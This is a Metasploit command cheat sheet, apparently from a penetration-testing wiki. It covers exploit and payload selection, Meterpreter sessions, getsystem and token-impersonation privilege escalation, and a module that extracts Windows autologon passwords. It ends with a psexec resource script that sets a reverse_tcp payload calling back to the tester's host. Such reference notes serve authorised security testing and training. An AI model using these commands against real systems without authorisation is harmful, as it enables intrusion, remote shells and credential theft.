Metasploit Framework (MSF)

The world’s most used penetration testing framework Metasploit

Start

Start db

msfdb start

or

systemctl start postgresql

Start metasploit framework console

msfconsole

Exploits

Select exploit

use <exploit>

Run exploit

run

or

exploit

Options

Show options

show options

Show advanced options

show advanced

Set option

set <option> <value>

Set option (global)

setg <option> <value>

Payloads

Show payloads

show payloads

Select payload

set payload <payload>

Sessions

Show sessions

sessions -h

Interact with session

sessions <number>

Send session to background

background

Meterpreter

The shell command will present you with a standard shell on the target system.

shell

Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

getsystem

Encoders

Show encoders

show encoders

Select encoder

set encoder <encoder>

Misc

Search for exploits

search <term>

Go back

back

Display help

help

Get info about current context?

info
show auxiliary

Multi/handler

Just start listener

use exploit/multi/handler

Jobs

Start job in background

run -j

Show jobs

jobs

Post exploitation

This module suggests local meterpreter exploits that can be used.

use post/multi/recon/local_exploit_suggester

This module extracts the plain-text Windows user login password in Registry.

use post/windows/gather/credentials/windows_autologin

This module will login with the specified username/password and execute the supplied command as a hidden process.

use post/windows/manage/run_as

Meterpreter session

Upgrade shell to meterpreter shell

post/multi/manage/shell_to_meterpreter

Migrate to other (e.g. more stable) process

migrate

Get system info

sysinfo

Port forwarding

portfwd add -l <port> -r 127.0.0.1 -p <port>

Impersonation (Windows)

Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc.

whoami /priv

Load incognito module and list available tokens

load incognito
list_tokens -g

Impersonate e.g. BUILTIN\Administrators

impersonate_token "BUILTIN\Administrators"

Migrate to a process with the correct permission, to actually get the elevated permissions (token != permission).

ps 
migrate <pid>

Resource Scripts

Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit.

msfconsole -r demo.rc

demo.rc

use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>
PreviousMemory forensicsNextMITM

Last updated